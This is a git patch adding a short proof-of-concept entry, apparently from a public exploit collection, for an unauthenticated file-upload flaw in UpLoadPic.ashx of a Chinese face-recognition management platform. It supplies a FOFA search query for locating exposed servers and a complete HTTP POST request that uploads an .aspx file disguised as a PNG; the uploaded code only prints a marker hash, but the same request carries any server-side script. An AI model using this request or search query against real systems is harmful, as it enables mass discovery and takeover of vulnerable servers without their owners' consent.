From 1cd045a6b396ec4bf060a3d2ce96ab02026898de Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sun, 28 Apr 2024 20:19:37 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E8=84=B8=E7=88=B1=E4=BA=91=E4=B8=80?=
 =?UTF-8?q?=E8=84=B8=E9=80=9A=E6=99=BA=E6=85=A7=E7=AE=A1=E7=90=86=E5=B9=B3?=
 =?UTF-8?q?=E5=8F=B0=E5=AD=98=E5=9C=A8UpLoadPic.ashx=E6=96=87=E4=BB=B6?=
 =?UTF-8?q?=E4=B8=8A=E4=BC=A0=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...通智慧管理平台存在UpLoadPic.ashx文件上传漏洞.md | 38 +++++++++++++++++++
 1 file changed, 38 insertions(+)
 create mode 100644 脸爱云一脸通智慧管理平台存在UpLoadPic.ashx文件上传漏洞.md

diff --git a/脸爱云一脸通智慧管理平台存在UpLoadPic.ashx文件上传漏洞.md b/脸爱云一脸通智慧管理平台存在UpLoadPic.ashx文件上传漏洞.md
new file mode 100644
index 0000000..1f871ff
--- /dev/null
+++ b/脸爱云一脸通智慧管理平台存在UpLoadPic.ashx文件上传漏洞.md
@@ -0,0 +1,38 @@
+## 脸爱云一脸通智慧管理平台存在UpLoadPic.ashx文件上传漏洞
+
+## fofa
+```
+body="View/UserReserved/UserReservedTest.aspx"
+```
+
+## poc
+```
+POST /UpLoadPic.ashx HTTP/1.1
+Host: {{Hostname}}
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Content-Length: 431
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywt7cEu1eBdibB13u
+X-Requested-With: XMLHttpRequest
+
+------WebKitFormBoundarywt7cEu1eBdibB13u
+Content-Disposition: form-data; name="action"
+
+post
+------WebKitFormBoundarywt7cEu1eBdibB13u
+Content-Disposition: form-data; name="myPhoto"; filename="1.aspx"
+Content-Type: image/png
+
+<% response.write("FC5E038D38A57032085441E7FE7010B0") %>
+
+------WebKitFormBoundarywt7cEu1eBdibB13u
+Content-Disposition: form-data; name="oldName"
+
+
+------WebKitFormBoundarywt7cEu1eBdibB13u--
+```
+
+![619efcae85a32a8fdae1b493ff2b8959](https://github.com/wy876/POC/assets/139549762/e9fd66c1-a64f-4f77-be49-cd53198aabe9)